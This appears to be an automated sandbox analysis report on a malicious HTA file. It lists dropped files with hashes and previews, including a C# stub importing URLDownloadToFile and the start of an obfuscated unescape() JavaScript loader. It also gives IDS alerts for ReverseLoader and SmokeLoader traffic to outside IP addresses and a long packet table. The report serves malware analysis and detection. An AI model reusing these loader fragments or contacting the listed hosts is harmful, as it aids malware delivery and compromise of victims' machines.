SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0951232474795463
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grysrak7YnqqFEPN5Dlq5J:+RI+ycuZhNarakSFEPNnqX
MD5:	0DD06B708B091E4FEB5917F19843E9AC
SHA1:	EE66CFBC0B55777FD6386432F7EC6121A4F00375
SHA-256:	650B759DA76B3336435ADEC9AC382D537D50606B276BA6C31D956221C0D0F980
SHA-512:	A8F36B3BD51B1A65F512D984C74294E922245853B114D88F1093FFAB2D9875C833C702BC1900E93159BB284ACB8BC47F15EFFBA4BC182D46A71E0A5434428A76
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.h.j.2.b.m.0.i...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.h.j.2.b.m.0.i...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.0.cs

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (366)
Category:	dropped
Size (bytes):	478
Entropy (8bit):	3.72824635699777
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zukLU3FdMGHQXReKJ8SRHy4HDFmQyC7m0NewdKy:V/DTLDfueCKXfHt1Cy
MD5:	7836723690E40C9D8FBF78FBD248C066
SHA1:	6A0F9FB57575624AD9CA54108ABB75CB6B20FD3D
SHA-256:	A1DD056C3C937DD2FEF8D026745F706DA97F13205FEBA1BDAE492D4B2CAD07A9
SHA-512:	10C093F3AAEF531E31196AFCC50FE7D554EEE7D49206046F0D0A6DD86F23CE73067A7B926B6ACAC810A5D33ECC98B605B1FF1E6EAF0D404A4C1D9265F8AC06A3
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace NsDHjxA.{. public class x. {. [DllImport("urlmON.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr uqxAu,string gHWgkmN,string mtZIYqXIBh,uint Q,IntPtr jtRl);.. }..}.

C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
Category:	dropped
Size (bytes):	369
Entropy (8bit):	5.25973014987794
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fxtxqzxs7+AEszIwkn23fxtxPn:p37Lvkmb6KRfptxqWZEifptxPn
MD5:	192813CD571446B3D77120F5DB17CD91
SHA1:	5C7E9B74FFEA4C4AAEEA84484432609A4D96CD5D
SHA-256:	85EAABA4C1E89005DEF13C6B2749FD71D4F6017F85101E7055F0DD7A1DFBA1FC
SHA-512:	388C75287127DCF11D2A4FC810202D3C5FF429530353A1E599CF68FA43BC4FE4E3748EF5A7BB25D4333DB9D68AAA1825682A1F6BB0AC8DC72B325A0588555B02
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.0.cs"

C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.814771807632319
Encrypted:	false
SSDEEP:	24:etGSuPBu5exl8qZ/k/YyUPrytkZfq74HrjcUWI+ycuZhNarakSFEPNnq:6tsx+qvyUPZJq7WA31ulma3yq
MD5:	0D55E0D2BEB3C691C78B52986B205916
SHA1:	91419B951B46BB45019F7B8CEFCBFC638CA1D485
SHA-256:	EB764FD412DA9F5563B15E9F338332E53B05D7F53DF4A625ADC5683DCEDFDCF0
SHA-512:	05AF2843ED2BD2D51C805D1BE1B0C4766874F6D30623FB0E2EFC7617F15A04FB87788CB7D8916A5029EFDFAB5807FBC8191FF617DAF3CC4AA3AAA6B8549F2414
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j~g...........!.................#... ...@....... ....................................@.................................T#..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................1......p.....p.......................................... 8.....P ......J.........P.....V.....^.....i.....k...J.....J...!.J.....J.......!.....*.......8.......................................!..........<Module>.th

C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.out

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
Category:	modified
Size (bytes):	867
Entropy (8bit):	5.320605481681496
Encrypted:	false
SSDEEP:	24:KJBqd3ka6KRfptxLEifptx2Kax5DqBVKVrdFAMBJTH:Cika6CpLLEupL2K2DcVKdBJj
MD5:	E0D21611AAEFDAC4AE9668EE82553FD9
SHA1:	5645149A5D47DD29E3520A31F0AC7F6C95BB1173
SHA-256:	ED05F6974F5DF7B57CB3564595F84E8D788B0AF0C92A8052C7A7D03A761F749B
SHA-512:	15DD2D4FB6103FEAA0B928CE5885FAE506183DDA027F07B36F668A34A568400E680E6C32475996600489314971D9CE3BEFF2C35076F3537DE30F5F2796E27A25
Malicious:	false
Preview:	.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Roaming\bigwsbu

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	339146
Entropy (8bit):	7.999445085868727
Encrypted:	true
SSDEEP:	6144:XjiOywhhl3rDOvFFhfjw+KllDuFkrQGxXy3O9PD7E9goOb:XJXWtc+elDIkrQGjt7ENOb
MD5:	9B968C019240321E16C0ECEC287370E1
SHA1:	0A37661DAFB4F153EB994B36446AD06007759570
SHA-256:	92CB933291A22AF5ADCF18CC2EB1D096A7E3232774EC6066450F61357C57B5AD
SHA-512:	2D981855BF9AEC392421C7D2AAEE025D2560688957E637C4D6411096D5DF5C5F471B6B037FF0D8851DDF4B7112A74FB0E0859E593A8FB43CD9C52CC81723C984
Malicious:	false
Preview:	'..k..=ze\|C.........;..].7..".(.S...7W..i...s2XT..K.4.....A...k.){..0W..A......).s..N>zm.=j...../.b...x]...H..<..."....Hp....'o..j=qn..O...V}.4.....].Kc...........$..".X,)_..t....."..Q......iz...r..,..y...h.V..o.....c......7..Sz.....UM#....f..Z.....@3.;.....2.U}Y..2..\eKG..xN[.../L.....+2\.o.w4RK..{}(..S#..4...t...`{.\..P......I.b%%D....../.8`.o.3..mb).Dye.h..:.X.Y..B..z..s...i...,kg-.pL..H.?.p.D..0....7<........r...yC46./.X...i.M.w.{.2..g)n.c..r=...(.....8.Q.. 2y.^....Af.!..8.[1.x..H.lN..y..KX.].t......h"{@E..S6..Zy....7Ur7e....Y...q...0.M..Z..,.31.....\|n.J-.".^".......;_.F........G..8K.kP......+{.......7....F}A`.2=...W...~!....iS..=.(.&}T..nP...E.. .A.7...........}m.....:q..p&F.S/T...1[.w.....D..2F..{.........bu.9..^.HM:c!......=....M...y..<..K......W....[...&....*.eN...).V.......)>..0....C<p..5&.u.I........\._...U......o...]..?...$..K..{_.qc.]. .?.<Q....9...#..>...e..x2;....U....(.3`...D.X.......4r.9.._.Bj.u(.\Q.D..TtW..gPO..K.Kn..X..

C:\Users\user\AppData\Roaming\icgfugf

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	56368
Entropy (8bit):	6.120994357619221
Encrypted:	false
SSDEEP:	768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
MD5:	FDA8C8F2A4E100AFB14C13DFCBCAB2D2
SHA1:	19DFD86294C4A525BA21C6AF77681B2A9BBECB55
SHA-256:	99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
SHA-512:	94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.hta, Detection: malicious, Browse Filename: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta, Detection: malicious, Browse Filename: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta, Detection: malicious, Browse Filename: invoice727282_PDF..exe, Detection: malicious, Browse Filename: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs, Detection: malicious, Browse Filename: 6038732).vbs, Detection: malicious, Browse Filename: cirby0J3LP.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse Filename: 3vj5tYFb6a.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(......(....-...~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....

C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 text, with very long lines (12085), with CRLF line terminators
Category:	dropped
Size (bytes):	224763
Entropy (8bit):	5.3949239509459925
Encrypted:	false
SSDEEP:	3072:A8gVmI3b0mgfmWu+ke9VOv5iG5sVhQ30Wk+70wgA1A:A8gVxe9VOvM
MD5:	8CCD875893CD23B67D7C61EA735F5C52
SHA1:	6171C7DD4F67A67FFF0CA151C7E9A06104E00DEF
SHA-256:	16328212055D6AA79C45B6624607F74B732B159DB4C6CDF7D8E6835EBDC6E392
SHA-512:	3CEB06944FB1CB3F176E9163F761E3C2D97E72A9E0177F417D4A83E03F4B539FBCB2D7EBE53865A483CACDC8EAF16CE292245AED1CC60C207F7CA038CED07F31
Malicious:	true
Preview:	Dim sh 'WScript.Shell object..Dim fso 'Scripting.FileSystemObject..Dim format 'StringFormatter object..Dim suiteFolder 'string: folder where test suite scripts are located..Dim projectFolder 'string: root folder for this project..Dim suiteFilter 'string: filename filter for selecting integration test suites...Dim caption 'string: MsgBox/PopUp title bar text...Dim aDocGens 'array of strings: filespecs for code-comment-based documentation generators...Dim aGits 'array of strings: common filespecs for Git bash and Git GUI executables...Dim aDocs 'array of strings: filespecs for last-minute docs to update before a push...Dim nextItem 'integer: current index of the prepItems array...Dim settings 'integer: controls MsgBox/PopUp behaviour...Dim prepItems 'array: list of prcedure (Sub) names to be called by window.SetTimeout...Dim flagFile 'string: filename of a temp file used by Setup.vbs...Dim versionLink 'web page with version info..Dim editor 'document editor..Dim powershell 'filespec of a

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Roaming\icgfugf
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	221
Entropy (8bit):	4.801526423190794
Encrypted:	false
SSDEEP:	6:zx3Me21f1LRJIQtAMw/VgRZBXVN+1GFJqozrCib:zKpj1JIUwqBFN+1Q3b
MD5:	A3DCA41A950A7DF7ECE76A867A17400E
SHA1:	AA9EFDBCF37BEE2C7FD0986F1A4308A73EC3F7BB
SHA-256:	6B2BE177016DF867316A0C432DAB0B71B6E51B35D169B0ACB1ABB47A4C03D7C0
SHA-512:	F80207B5B78C7AE867AAB139196BBBEDE0437961DD03E790AEF3B877A228D7A90B9178B3342324B0EEA1C270E2A232A769B2F2D9E5DB4C065EB95140FA12239D
Malicious:	false
Preview:	Microsoft (R) ASP.NET Compilation Tool version 4.8.4084.0..Utility to precompile an ASP.NET application..Copyright (C) Microsoft Corporation. All rights reserved.....Run 'aspnet_compiler -?' for a list of valid options...

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (65505), with CRLF line terminators
Entropy (8bit):	3.218143319124101
TrID:	HyperText Markup Language (13008/1) 61.90% HTML Application (8008/1) 38.10%
File name:	begoodforeverythinggreatthingsformebetterforgood.hta
File size:	110'765 bytes
MD5:	b7bd51ea4a3cbb85901f5e467009beaa
SHA1:	2daa4cd4c7eca9c42ff00e7d1a4e027f55b836bc
SHA256:	4d919faa895db3832df86d7ef8509c11140718904f7957d0e6d44b830827f073
SHA512:	0d30af8454e5a74674e4f971e40a7c7781d0c29d48c25dd327b7bccad07f6208db24a078d8e03c07ae2bac7ac3ceba01b67668f7b3108456406c7a258fced032
SSDEEP:	384:Fipci1dZ2FGFZrZi9qiA/zRj6TiezFSw4M7333j333V333x333kD333n33P333UM:zFLFSwkGpe1zOhVadsRZ4
TLSH:	CDB36BFA5442E0BAE5DBC6BFFC9C2DA415009F27DDE85F4515EC880D6BE82C63124AC9
File Content Preview:	<script>.. ..(function() {.. var d = unescape("%36%36%31%37%39%62%64%30%32%31%31%62%63%63%39%39%20%64%28%33%27%38%3d%34%29%63%4c%58%51%50%22%0a%20%51%49%58%45%63%4c%58%58%54%70%49%55%59%4d%5a%21%65%3c%70%39%25%70%27%53%51%54%45%58%4d%46%50%49%65%63%

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-08T11:08:59.528574+0100	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.4	49733	192.3.27.144	80	TCP
2025-01-08T11:09:49.834350+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49744	46.173.214.14	80	TCP
2025-01-08T11:09:50.092954+0100	2829848	ETPRO MALWARE SmokeLoader encrypted module (3)	2	46.173.214.14	80	192.168.2.4	49744	TCP
2025-01-08T11:09:54.445641+0100	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.4	49746	46.173.214.14	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 8, 2025 11:08:59.056233883 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.061186075 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.061270952 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.061459064 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.066232920 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.528511047 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.528531075 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.528542995 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.528556108 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.528568983 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.528573990 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.528580904 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.528594017 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.528604031 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.528616905 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.528637886 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.528651953 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.528659105 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.528675079 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.528697968 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.533556938 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.533585072 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.533648968 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.533648968 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.533699036 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.533709049 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.533734083 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.803953886 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.803971052 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.803987026 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804007053 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804022074 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804033995 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804035902 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.804044962 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804056883 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804068089 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.804068089 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804083109 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804094076 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804105997 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804116964 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804124117 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.804128885 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804152012 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.804156065 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804164886 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.804168940 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804182053 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804194927 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804195881 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.804209948 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.804245949 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.804267883 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804280043 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804291010 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804302931 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804312944 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804318905 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.804328918 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804339886 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.804352045 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.804371119 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.810302019 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.810316086 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.810328007 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.810359955 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.810381889 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.810434103 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.810446024 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.810456991 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.810496092 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.810507059 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.810519934 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.810530901 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.810540915 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.810568094 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.810595036 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.811470985 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.811481953 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.811500072 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.811510086 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.811522007 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.811522007 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.811537027 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.811552048 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.811569929 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.812426090 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.812437057 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.812448025 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.812479973 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.812490940 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.812501907 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.812513113 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.812520981 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.812544107 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.812561989 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.813407898 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.813419104 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.813430071 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.813483000 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.813493013 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.813500881 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.813500881 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.813507080 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.813532114 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.813760996 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.814398050 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.814409018 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.814419985 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.814440966 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.814470053 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.814516068 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.814527035 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.814538956 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.814554930 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.814574003 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.815371990 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.815385103 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.815395117 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.815413952 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.815424919 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.815435886 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.815438032 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.815455914 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.815479994 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.816365957 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.816376925 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.816386938 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.816404104 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.816414118 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.816417933 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.816426992 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.816456079 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.816476107 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.817290068 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.817313910 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.817338943 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.817357063 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.817620039 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.817662954 CET	49733	80	192.168.2.4	192.3.27.144
Jan 8, 2025 11:08:59.817693949 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.817704916 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.817733049 CET	80	49733	192.3.27.144	192.168.2.4
Jan 8, 2025 11:08:59.817737103 CET	49733	80	192.168.2.4	192.3.27.144
